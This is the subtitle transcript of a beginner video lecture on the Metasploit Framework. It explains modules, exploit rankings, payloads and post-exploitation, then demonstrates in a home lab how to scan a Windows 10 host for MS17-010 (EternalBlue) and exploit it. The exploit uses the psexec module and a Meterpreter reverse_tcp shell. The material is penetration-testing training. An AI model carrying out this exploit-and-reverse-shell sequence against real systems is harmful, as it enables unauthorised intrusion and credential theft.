All language subtitles for 0000 Metasploit Framework.en--- [ FreeCourseWeb.com ] ---

[00:00:11] Welcome back to another episode on How to Hack. So today we'll be discussing about Metasploit framework for beginners, and we'll be looking at the architecture or the framework of Metasploit framework, and look at the modules that are available inside Metasploit, as well as exploits and exploitation that we'll use alongside Metasploit. And this can really accelerate the pace of how quickly we're performing our penetration testing. And this can be really useful and helpful, especially when we are trying to understand more about how we could utilize Metasploit to help us get access into systems, find vulnerabilities, look at exploits as well as payloads that are available, as well as, on top of that, post exploitation. What do we do after we get into the system? Are we able to dump passwords? Will we be able to get privilege escalation? So again, all these are key questions that you probably have if you have been using Metasploit for a while now.
[00:01:01] So what exactly is Metasploit framework? So Metasploit framework is a penetration testing platform that allows us to use different modules, and the modules, on the right, you can see a module is a standalone piece of code that is in some or in a lot of ways not interacting with the other modules inside Metasploit framework. So you could do this on yourself if you look at some of the template guides about coding your own exploits or your own modules inside Metasploit framework. So that's a great way to start off with, especially later on when you're trying to program some of these features. And we'll definitely be uploading a video about how you could create your own modules, look at some of the exploits that you could potentially look at and be able to use and upload or change some of the code, because everything is open source. So Metasploit framework has two versions. One is the Pro version, so you have to pay for that. And the one that we've been looking at in a lot of tutorials has always been the free one. And of course, there are some limitations in terms of the free one. So, again, if you are a full time penetration tester or you're doing a lot of security assessments, it is highly recommended to go for the paid version. And of course, if you look at the bottom, we have the services of Metasploit.
[00:02:05] So, again, if you look at some of the tutorials online, we could see that sometimes people would have to start up PostgreSQL in order to start running the database services inside Metasploit. So, again, this could be because Metasploit uses PostgreSQL to actually store all this data. So, again, you have to start the services before you're able to kick-start Metasploit framework.

[00:02:26] So today, we'll cover three key points in the agenda. So first of all is about Metasploit framework, how does it work? And what are the modules that are available for you using Metasploit framework? And lastly, how can we scope and define the kind of parameters and options that we want to push into the system?

[00:02:45] So first of all, let's understand three key points as part of Metasploit framework. So the very first is vulnerability. We have to make sure that we want to find a vulnerability inside the system, inside the machine we're trying to hack into, by using exploits and so on. So this is the part where we have the scanning modules available in Metasploit framework that we can utilize, or we could also use other tools like Nmap to find out the service version or the software version that has those services running, or to find out what kind of services are running in the system.
[00:03:14] So, again, if a system is fully patched and has no vulnerability, then we have to start thinking about zero day potential, as we want to craft our exploit inside the system. So, again, that could be very tedious and cumbersome and could take a really long time to develop. And of course, the vulnerabilities are basically areas of opportunity where we can actually hack into the system. So vulnerability will be one of the key terms that we must understand. And number two is in terms of exploit. So exploit is what happens when we are able to bypass the security mechanism inside a particular service or a software or operating system. So, again, this allows us to be able to take control of the system, to control the software or the services running inside an operating system. And the third is payload. So payload is: what do we do after we get into the system? Do we want a shell? Do we want it to trigger a shutdown? So again, payloads come alongside with Metasploit mainly as shells to give us control of the system so that we can do a lot more different kinds of commands, manipulation of the system, as part of Metasploit framework.

[00:04:19] So what's the advantage of using Metasploit framework compared to, say, using a manual way of trying to do penetration testing? So there are five key ways for us to think about in terms of the advantages.
[00:04:28] So one is, Metasploit is used a lot in a lot of penetration testing tools, a lot of auditing platforms. And it is used extensively to test companies for their security posture very, very frequently. And as such, having a skill set in Metasploit will be very helpful for you, because whenever you're joining a new team of penetration testers, chances are they have Metasploit framework running. And it will be great if you are familiar with it, because some of the interview questions could also come alongside with that. And of course, the great thing is that it simplifies complicated or complex tasks. So complex tasks, meaning that you have a sequence of actions that need to be carried out as part of your penetration testing. As such, you could use Metasploit scripts to also automate it for you as much as possible, so you can simplify many of these complex tasks together. And you can also put a session in the background and use your own scripts to run through and execute inside a current session. So, again, a lot of this complexity can be taken out and simplified for the user of Metasploit. Number three is in terms of the range of capabilities that you can use along with Metasploit, because it is built in an orderly and systematic way.
[00:05:35] So you can think of the modules that are available: you have auxiliary scanners and you have exploits and you have post exploitation. So all these are really segmented into many different modules, many different in terms of a cyber attack chain. How are you trying to work around a system? So again, all this is already laid out for you. So it's easy for you to visualize how, where you are in the attack phase, which part of the penetration testing you're at and what is the next step for you in order to carry them out. So there are also consistent updates. You get a lot of updates as you run Metasploit framework in your system. So all these updates can help troubleshoot the system, make sure the systems are running fine and making sure your exploits are working as intended. So, again, all these updates are great for you, especially in terms of trying to make sure that you can perform your penetration testing smoothly. And of course, the great point is there are thousands of modules inside Metasploit framework. And this is really helpful because all these functions have been built by many of these penetration testers.
[00:06:33] And you can use them and be able to accelerate how quickly you are performing a penetration test, and all these tools at hand help you find out potential vulnerabilities, exploits, as well as payloads, so that you are able to speed up the pace of how quickly you could get into the system and generate those reports necessary in order to find out more things about the entity, the target entity or the target enterprise.

[00:07:00] So here we've got a screenshot of Metasploit. So whenever you're in Kali Linux, or if you have installed it on your Windows operating system, all you do is enter msfconsole. You'll be brought into this page. So here we can see you've got 2004 exploits, 109 auxiliary, 342 post, 564 payloads, 45 encoders, 10 nops and 7 evasion. So again, a lot of modules available as part of it. That could be our arsenal of attack when it comes to doing and performing penetration testing.

[00:07:31] So one of the key things I really want to share with you as the number one advice when it comes to using Metasploit framework is to go into the help wherever you are. So it is an interactive shell. So every time you're moving from one shell to another shell, or you're moving from one place to another inside Metasploit framework, go ahead and enter help freely; enter help whenever you have the chance to.
[00:07:51] And you can see all the commands available to you that you can key in, that you can enter into. And this is really helpful for you to get yourself familiar with the use of Metasploit framework. So over here, in this case, we enter help and we can see all the functions and features and commands that we can use alongside with it. So this is really helpful in terms of trying to get yourself familiar with Metasploit framework.

[00:08:14] So, of course, now we move on into the exploits. So exploits are ranked. Exploits are ranked in terms of how good they are to actually go after the system. So we've got a ranking of excellent, great, good, normal, average, low and manual. So, of course, the best option to choose from will be the excellent ranking, because that entry into the system doesn't crash, because if the system crashes, then that could actually alert system administrators. And if you're doing a penetration test on production systems, this is highly dangerous. In fact, most of the time you should always go after penetration testing on the environment where the systems are actually mirrored to a separate lab test or a virtual setup where you could actually mimic the real life production environment and be able to do all this testing on. So that'll be the number one advice for whenever we're doing penetration testing. So of course, we've got the different kinds of rankings.
[00:09:04] So we have to choose wisely what we want to use when it comes to executing many of these payloads.

[00:09:12] So over here, when you do a search on exploit or you want to show exploits, it will show you the thousands of exploits available. And of course, the first one we can look at is the ID number. So the number starts from one and goes all the way to the last one, and we can see "windows", which we understand is for the Windows operating system. So again, it could be Unix, it could be any other type of Android devices as well. So depending on the operating system, followed by the service on top of the operating system, and from the service, followed by a service type or service version. So that could be very software driven. So let's say, for example, you're using Windows, so it could be a directory, could be Easy FTP. And of course, followed by the date, the date when the CVE, common vulnerability exposure, was released, followed by the ranking of the exploit, yes or no, and the final one is actually on the version number of the particular exploit.

[00:10:08] So over here, of course, we can show options whenever we are inside Metasploit framework. So once you have selected the use of that particular exploit, payload or any of those modules, you can enter show options.
[00:10:19] So show options will show you the parameters that are needed in order to execute this particular module. So in this case, we're using Windows SMB MS17-010. So in this case, we've got our hosts, we've got DG Treys, we've got something like a named pipe and so on. So, again, all this, some of them, if you see under the third column, is required. So required means it's compulsory, it is a value that you must specify in order to use that particular module. And of course, on the right side, we have the description about the module, and here all the description about a parameter and an option that you have. So, again, very important. If you need any help, go ahead and enter help to really understand more about the module and all the commands that are available for you to use as part of the module.

[00:11:07] Of course, this would bring us into the payload. So what happens after you've exploited the system? You want to execute something. What do you want to execute? Most of the time, a payload, and a payload is usually a shell. So, again, there are a number of shells that we can choose from. So you see on the background, we have windows, which is the operating system type, x64 architecture, the platform architecture. And then, of course, we've got shell and we've got Meterpreter with the different protocols.
[00:11:30] The most popular one of all, because it gives us a lot of capabilities in terms of penetration testing, while we can also do and get a normal shell of Windows. Again, this is depending on the kind of privileges you're going to get or you think that you're going to get as part of your penetration testing. But the most preferred, of course, is Meterpreter, but, of course, Meterpreter also has some of these potential items that could be detected by antivirus systems or endpoint detection and response systems. So, again, all this choosing of a selection of the payload is very important as part of penetration testing, especially if you're trying to penetrate into systems that are highly updated. So, again, all these are things that you want to keep in mind when you're selecting the kind of payloads to go in with.

[00:12:14] So here we go. Also, Meterpreter is a great way in terms of exploiting a system, getting the payload, which has a lot of functions and features in terms of post exploitation as well as exploitation. So in terms of privilege escalation, uploading, downloading files, etc., so it's a great way, especially in terms of running many different kinds of modules, especially when it comes to penetration testing. So it's one of the most preferred shells, if you could get it without detection.
[00:12:41] So again, this will be a great way for you to actually try out many of these different commands. So, again, as advised, enter help the moment you're in session, and this could actually show all the features and commands that you want to see. And from there on, you'll be able to find out things that you can do further and things that you could be limited to. And you can background the session and be able to run all those post exploitation modules.

[00:13:03] So, of course, this will bring us to post exploitation. So the question is always, now that we've exploited the system, what's next? What do I do next? How do I get passwords? How do I get persistence? So, again, there are a lot of post exploitation modules available inside Metasploit framework that can help you in that way. So, of course, this is how to attack into a target organization. You want to pivot from one machine to another machine. You want to do scanning on the environment. You want to find out what protocols they're using, what servers they have, what services they have on top of those servers. So, again, all these are capable of helping you actually expand the scope of your exploitation.

[00:13:43] So here we've got post Windows exploits.
[00:13:45] So, of course, you can actually do a search on post and we can actually see all the modules available as part of post exploitation. We've got privilege escalation and we've got dumping out of data, dumping of passwords. So, again, all these are there for us to take a look at. So especially when we go into the tutorial later, we can actually see many of these modules and see how they function and work and what kind of data we can actually pull out from the system. So directly from the screenshot we could see, we could look at post Windows manage webcam, we can look at resolving IP addresses, we can look at wireless list. So again, all these are some of the post exploitation modules we could be using in order to find out more information about a system, trying to get privilege escalation; again, many different items and features that we can look into.

[00:14:30] So there are also a lot of auxiliary modules available as part of Metasploit framework. So in this case, on the right side, we have admin, we've got crawlers, we've got scanners and we've got fuzzers. So when you go into Metasploit framework, you can search for auxiliary and you can see all these modules available or all these subcategories available. So there are a lot more subcategories that you can look at that may be outside the scope of today's lecture. So, again, do explore them whenever you have the time to.
[00:14:56] So, of course, the first one is the crawler. So the crawler actually allows us to crawl into the system, so it allows us to crawl through web application servers, allows us to find out subdirectories, do a crawl into the system, like how web crawlers are deployed from search engines, and we'll go into the site deeply, finding out things that may be accidentally exposed as publicly available information. So, again, we can use msfcrawler on that, and that can help us crawl into the web server and find out all this information.

[00:15:26] And of course, we've also got scanners. So scanners help us scan that particular service, whether it's available, whether it is vulnerable to different kinds of exploits. So we have done a number of tutorials about using the auxiliary scanner where we scan the Windows 10 operating system to see if it was vulnerable to EternalBlue. So, again, that could be the first step you take before you run the exploit, because if the system is not vulnerable, then you will not be able to exploit it. And then you have to start scanning for other items inside the target machine before you're able to run your exploit.

[00:15:58] So, of course, we have fuzzing. So we uploaded a new video on SQL injection; that was a full tutorial on that. So that was really interesting. So it's fairly similar in the sense that we are trying to fuzz the service of the system.
[00:16:11] We're trying to inject code into the system to break it, to get past the buffer and be able to inject things into the system. So we're trying to find software bugs. So in this case, as part of the auxiliary modules of fuzzing inside Metasploit framework, we've got support for different protocols. So we've got DNS, FTP and so on. So again, all these are ways and areas where we can try to push and inject code into those services to see when we can actually find vulnerabilities inside a system. So it's a lot more manual effort in terms of checking those systems or services for vulnerabilities.

[00:16:48] So, of course, before we go into the tutorial, the most important question right now you have in your mind is how can we write our own exploits in Metasploit framework? So again, we are going to cover it in a subsequent tutorial. So stay tuned for that. So for now, let us go into the tutorial of going through Metasploit framework. So on the left side of the screen we've got Kali Linux running, and all you've got to do is actually click on the terminal emulator and we can actually zoom in a little so it's easier for you to see. So I can actually go in and enter msfconsole. So this will start up Metasploit framework immediately, just like what we see on the lecture slide.
[00:17:23] So I'm here on the lecture slide. We can see that we actually key in msfconsole. So over here we are starting the Metasploit framework console. So once we're in, we'll be able to see, number one, the number of exploits, auxiliary modules, post exploitation, payloads, encoders and nops as well, seven evasion. So now once we're in, all you've got to do is enter help. So when you enter help, it will show you all the commands available. So again, wherever you are in the interactive shell, it's great if you have the ability to go into the help page or help command, and it will show you all the parameters and all the commands that you can actually key in into the system. So this is a great way to actually explore and begin exploring Metasploit framework. So a very important way to understand more about exploiting.

[00:18:09] So, of course, as demonstrated on the lecture slide, we'll be looking also, of course, at some other key areas in terms of exploits. So you can actually enter show followed by exploits and you hit enter and that's it. So if you enter show and if you do a double tab on the keyboard, it will show all the options that you have as part of show. So here when you see show, there's show all, show auxiliary, encoders and so on. So of course we can enter show, for example, on exploits.
[00:18:36] So this would actually show and pull out all the exploits from the database. And it will show you what exploits are available as part of Metasploit framework. So when I hit enter, this could take some time to load because it's trying to pull all this data out from the database. So it may take a little while for the query to complete. So of course, likewise you could see show all, you could enter show auxiliary and exploits, nops, show options, payloads and so on. So again, a very important way for us to understand how we could actually see all the modules inside the system. So show is one of those commands that you will use extensively to actually find out modules that you can look out for. And another option that we have is also in terms of searching. So in terms of searching, we can also search specifically, we can search for any keywords, just like how you use any of the search engines, so you can enter search, followed by the type of payload that you could be looking for. You could be looking for anything, perhaps, for example, related to Android or anything, for example, related to Apache. So, again, all these are things that you can actually look for as you are using Metasploit framework. So, of course, in this case, we're still waiting for this show. So now we have the return.
310 00:19:43,630 --> 00:19:48,760 So if you remember earlier from the lecture, right over here on the right side, we have different kinds
311 00:19:48,760 --> 00:19:49,820 of ratings.
312 00:19:49,820 --> 00:19:50,350 So ranking.
313 00:19:50,350 --> 00:19:55,930 So we got the rankings of excellent, great, good, normal, average, low and manual.
314 00:19:56,260 --> 00:20:01,330 So in this case, when you enter show exploits, we can see normal, average, manual,
315 00:20:01,330 --> 00:20:01,780 great.
316 00:20:02,050 --> 00:20:04,540 And maybe you're looking for excellent over here, likewise.
317 00:20:04,540 --> 00:20:05,550 We can see it over here.
318 00:20:05,950 --> 00:20:10,090 So again, we are able to see all the module information as part of it.
319 00:20:10,840 --> 00:20:12,940 So, of course, moving back, we can enter
320 00:20:12,940 --> 00:20:13,420 search.
321 00:20:13,420 --> 00:20:13,810 Well.
322 00:20:13,810 --> 00:20:17,320 And perhaps you want to search for Android, so you can search on that.
323 00:20:17,320 --> 00:20:20,220 And it will show you all the different modules available.
324 00:20:20,230 --> 00:20:25,500 So if you scroll all the way up, it's actually over here, we can see auxiliary as the type of modules
325 00:20:25,510 --> 00:20:26,350 we're looking for.
326 00:20:26,380 --> 00:20:29,290 And now we have the admin, Android, Google Play Store.
327 00:20:29,650 --> 00:20:32,920 And of course, we got a ranking, disclosure date, as a CSV exploit.
328 00:20:33,370 --> 00:20:36,540 And of course, on the right side, we have a description of the particular module.
329 00:20:37,150 --> 00:20:41,080 So as you scroll down, we can see the different kinds of auxiliary modules that are available for you to
330 00:20:41,080 --> 00:20:41,480 use.
331 00:20:41,710 --> 00:20:46,090 So we have gather, we have gather, we got a scanner again, we got a server.
332 00:20:46,630 --> 00:20:50,950 And of course, as you scroll down, we have exploit, followed by the operating system type.
333 00:20:51,370 --> 00:20:56,410 And then the major category followed by the subcategory or the name of the particular service that
334 00:20:56,410 --> 00:20:57,470 we're exploiting into.
335 00:20:57,730 --> 00:20:59,740 So here we got the Android Debug Bridge.
336 00:20:59,740 --> 00:21:06,040 So we actually showed Android Debug Bridge in the past few videos, about how we could actually be able to exploit
337 00:21:06,040 --> 00:21:06,190 them.
338 00:21:06,220 --> 00:21:08,020 So, again, really, really useful on that.
339 00:21:08,380 --> 00:21:14,410 So we've got Stagefright MP4, so this is a way for actually the user to execute an MP4 video file
340 00:21:14,620 --> 00:21:16,340 and you gain complete control of the system.
341 00:21:16,660 --> 00:21:20,560 So again, many exploits for us to actually try and test out on.
342 00:21:20,770 --> 00:21:24,250 It's a great way for us to understand more about a system, the operating system in question.
343 00:21:24,640 --> 00:21:26,260 And of course, we've got different kinds of payloads.
344 00:21:26,950 --> 00:21:28,840 So payloads are basically giving us a shell.
345 00:21:29,080 --> 00:21:31,030 So we got a normal Android shell.
346 00:21:31,030 --> 00:21:34,030 And of course, we also got the Meterpreter shell over here that you can see.
347 00:21:34,030 --> 00:21:37,640 So reverse TCP, reverse HTTPS.
348 00:21:37,930 --> 00:21:41,050 And of course we've got post exploitation as part of the operating system.
349 00:21:41,050 --> 00:21:44,710 So we've got post Android gather, trying to dump all hash values.
350 00:21:45,160 --> 00:21:47,020 We're trying to get some information.
351 00:21:47,140 --> 00:21:51,460 We are trying to get wireless access point information, so again, also another great one, removing
352 00:21:51,460 --> 00:21:53,500 a lock from the remote device.
353 00:21:53,540 --> 00:21:58,300 So, again, many different post exploitation modules that we can look at as part of the Metasploit Framework.
354 00:21:59,920 --> 00:22:04,660 So moving forward, of course, we have seen all of the exploits and of course, over here we can also
355 00:22:04,660 --> 00:22:05,740 use exploits.
356 00:22:06,070 --> 00:22:10,870 So in this case, I actually have a Windows operating system running over here, so I can enter CMD.
357 00:22:10,900 --> 00:22:16,630 So this will show us the IP configuration of this particular operating system.
358 00:22:16,630 --> 00:22:19,400 So we got 192.168.1.89.
359 00:22:19,960 --> 00:22:24,610 So we are going to minimize this and that is going to be our target machine, and we're going to use
360 00:22:24,610 --> 00:22:27,060 Metasploit here to try to gain access into the system.
361 00:22:27,580 --> 00:22:32,710 So the first thing I use is perhaps I will search, I'll do a search on SMB because there is a very
362 00:22:32,710 --> 00:22:36,800 popular exploit in Windows using SMB, or I could search on EternalBlue.
363 00:22:37,030 --> 00:22:38,660 So again, either one would be fine.
364 00:22:39,040 --> 00:22:42,040 So there's a lot of SMB over here, so I can do a search on eternal.
365 00:22:43,150 --> 00:22:46,530 And over here we've got five matching modules from our search results.
366 00:22:46,990 --> 00:22:49,990 So the first one is an auxiliary module, admin.
367 00:22:49,990 --> 00:22:53,950 So it would be checking on the EternalBlue SMB Windows
368 00:22:53,950 --> 00:22:55,000 Command Execution.
369 00:22:55,270 --> 00:22:56,710 We got auxiliary scanner.
370 00:22:56,710 --> 00:23:03,270 So scanner is actually a way for us to scan a system to see if it is vulnerable to a particular exploit.
371 00:23:03,550 --> 00:23:05,230 And of course, we've got a number of exploits here.
372 00:23:05,240 --> 00:23:06,910 We've got two, three, four and five.
373 00:23:07,180 --> 00:23:11,830 So we've got EternalBlue, we got SMB MS17-010.
374 00:23:12,040 --> 00:23:14,290 So again, we've got EternalBlue, EternalBlue 8.
375 00:23:14,290 --> 00:23:21,190 We got execute, and of course that is on EternalChampion SMB Remote Windows Code Execution.
376 00:23:21,190 --> 00:23:30,190 We've got SMB DoublePulsar RCE, so we can actually enter use auxiliary/scanner/smb/smb_ms17_010,
377 00:23:30,190 --> 00:23:33,370 hit enter on that, enter show options.
378 00:23:34,660 --> 00:23:39,940 So over here again, if you look carefully back into the slides, we actually have a show options
379 00:23:39,940 --> 00:23:40,570 capability.
380 00:23:40,570 --> 00:23:45,710 So that is the part where we want to find out more information or details about the particular exploit.
381 00:23:45,910 --> 00:23:50,260 So again, we are able to find all that information directly from here by entering show options.
382 00:23:50,740 --> 00:23:53,830 So if you see over here, we can see all the show options available to you on that.
383 00:23:54,340 --> 00:23:55,750 So we can enter a set.
384 00:23:56,500 --> 00:23:58,890 Of course, here we can see the parameters that we have to key in.
385 00:23:58,900 --> 00:23:59,650 So required.
386 00:23:59,650 --> 00:24:00,260 No, required.
387 00:24:00,310 --> 00:24:02,140 No, no, that's a yes.
388 00:24:02,140 --> 00:24:02,670 Named pipes.
389 00:24:02,680 --> 00:24:07,060 So we have already supplied that information over there, and we have another one, RHOSTS, so we
390 00:24:07,060 --> 00:24:13,300 can actually set RHOSTS and we can actually specify the IP address of the target machine.
391 00:24:13,660 --> 00:24:15,950 So 192.168.1.89.
392 00:24:16,090 --> 00:24:21,940 So go ahead, enter that, 192.168.1.89, hit enter on that, and we can actually see
393 00:24:22,240 --> 00:24:25,270 the RHOSTS information, of course, moving forward.
394 00:24:25,300 --> 00:24:27,680 We see that the rest of the information has been filled in.
395 00:24:28,120 --> 00:24:30,090 So once you're done on that, go ahead, hit run.
396 00:24:30,640 --> 00:24:34,120 So again, here we are checking whether the system is vulnerable.
397 00:24:34,300 --> 00:24:40,770 So it says host is likely vulnerable to MS17-010, Windows 10, 14393,
398 00:24:41,030 --> 00:24:41,500 x64.
399 00:24:42,370 --> 00:24:47,380 So once we have checked on the system, we can do a search once again to actually find out what
400 00:24:47,380 --> 00:24:48,350 exploits we can use.
401 00:24:48,370 --> 00:24:55,750 So in this case, we can select number four, so we can enter use exploit windows SMB MS17-010
402 00:24:55,750 --> 00:24:56,320 psexec.
403 00:24:57,910 --> 00:25:09,160 So use exploit windows SMB MS17-010 psexec, hit enter on that and enter show options.
404 00:25:09,520 --> 00:25:15,010 So again, here we will see what the parameters are where it is compulsory for us to actually look into.
405 00:25:15,520 --> 00:25:20,290 So here we got the DBGTRACE, which has already been filled, leak attempts, already been filled.
406 00:25:20,560 --> 00:25:22,270 So we need to fill in our RHOSTS.
407 00:25:22,720 --> 00:25:28,240 So RHOSTS is the target IP address, as mentioned earlier; set RHOSTS 192.168.1.
408 00:25:28,390 --> 00:25:29,480 89.
409 00:25:29,500 --> 00:25:31,780 So in my case it is 89 again.
410 00:25:31,780 --> 00:25:34,210 In your case it could be a different IP address.
411 00:25:34,420 --> 00:25:40,300 So we can go ahead and hit enter on that, and now we can enter show payloads: what are the payloads available
412 00:25:40,300 --> 00:25:41,720 to go with this exploit?
413 00:25:42,070 --> 00:25:44,460 So again, it's retrieving the information from the database.
414 00:25:44,470 --> 00:25:49,330 So here we can see we've got two-zero-eight, the number of exploits, a number of payloads that we can use.
415 00:25:50,050 --> 00:25:51,500 So here we can see Windows x64.
416 00:25:51,520 --> 00:25:54,160 We can see reverse Meterpreter TCP.
417 00:25:54,400 --> 00:25:58,120 So the one that's going to be the most suitable for today's tutorial,
418 00:25:58,300 --> 00:26:03,400 we're actually on Meterpreter, so let's scroll up a little more and see that we can see all the Windows
419 00:26:03,520 --> 00:26:09,610 x64 Meterpreter shells that we can get, so in this case we are going to be more interested in this
420 00:26:09,610 --> 00:26:09,810 one.
421 00:26:09,820 --> 00:26:11,980 So this is a Windows x64
422 00:26:11,980 --> 00:26:14,210 Meterpreter reverse_tcp.
423 00:26:14,260 --> 00:26:15,610 So copy the selection.
424 00:26:16,240 --> 00:26:21,850 I'll scroll all the way down, I'll enter set payload and I'll paste the selection from the clipboard,
425 00:26:22,300 --> 00:26:25,840 so paste selection, hit enter on that, enter show options.
426 00:26:26,200 --> 00:26:31,710 So now because we have a payload that would give us a shell, a reverse shell, we have to set the LHOST,
427 00:26:31,720 --> 00:26:33,440 or the local listener hostname.
428 00:26:34,000 --> 00:26:40,080 So what I'm going to do is I'm going to enter ip addr to find the IP address of your Kali Linux machine.
429 00:26:40,090 --> 00:26:44,550 So in this case my Kali Linux machine is 192.168.1.91.
430 00:26:45,010 --> 00:26:46,480 So go ahead and enter set LHOST
431 00:26:47,440 --> 00:26:55,120 192.168.1.91 and type show options again to check all the options, all the
432 00:26:55,120 --> 00:26:57,940 values, and make sure that you have keyed in the parameters on that.
433 00:26:58,630 --> 00:27:00,010 So here we go, LHOST.
434 00:27:00,010 --> 00:27:06,120 We got the LPORT number as well, and we got all the parameters filled in as well in RHOSTS.
435 00:27:06,490 --> 00:27:10,170 So once you have all this information in place, go ahead, enter exploit.
436 00:27:10,270 --> 00:27:14,370 And that would give us our shell, allowing us to put a shell into the target machine.
437 00:27:14,800 --> 00:27:17,440 So once you're in the Meterpreter shell, go ahead and enter help.
438 00:27:17,680 --> 00:27:23,200 So once again, in help, we can see all the modules available for us and we can actually see a lot
439 00:27:23,200 --> 00:27:27,010 of information, a lot of capabilities, a lot of things that we can enter into.
440 00:27:27,490 --> 00:27:33,790 So one example is we can actually enter the different kinds of modules that we can use, the core commands
441 00:27:33,790 --> 00:27:34,490 that we can use.
442 00:27:34,810 --> 00:27:40,350 So the question mark also is a way to pull up the help manual, and we can background a current session.
443 00:27:40,360 --> 00:27:44,490 We can kill processes that are inside a system, we can migrate and so on.
444 00:27:44,500 --> 00:27:50,950 So some of the commonly used ones will be the system information, sysinfo, so we can go ahead and
445 00:27:50,950 --> 00:27:53,650 scroll all the way down and enter sysinfo.
446 00:27:54,070 --> 00:27:58,030 So it's very important that you try out all these different commands because it will be very helpful
447 00:27:58,030 --> 00:28:03,980 for you to get yourself familiar with the Metasploit Framework, so you understand everything about the Metasploit Framework.
448 00:28:04,630 --> 00:28:08,440 So once again, I hope you learned something valuable in today's lecture and tutorial.
449 00:28:08,710 --> 00:28:13,300 And if you like what you watch, remember to like, subscribe to the channel so that you can be kept abreast
450 00:28:13,390 --> 00:28:14,830 of the latest episode of the tutorial.
451 00:28:15,130 --> 00:28:19,300 And if you have any questions, feel free to leave a comment below and I'll try my best to answer any of
452 00:28:19,300 --> 00:28:19,900 your queries.
453 00:28:20,590 --> 00:28:22,120 Thank you so much once again for watching.
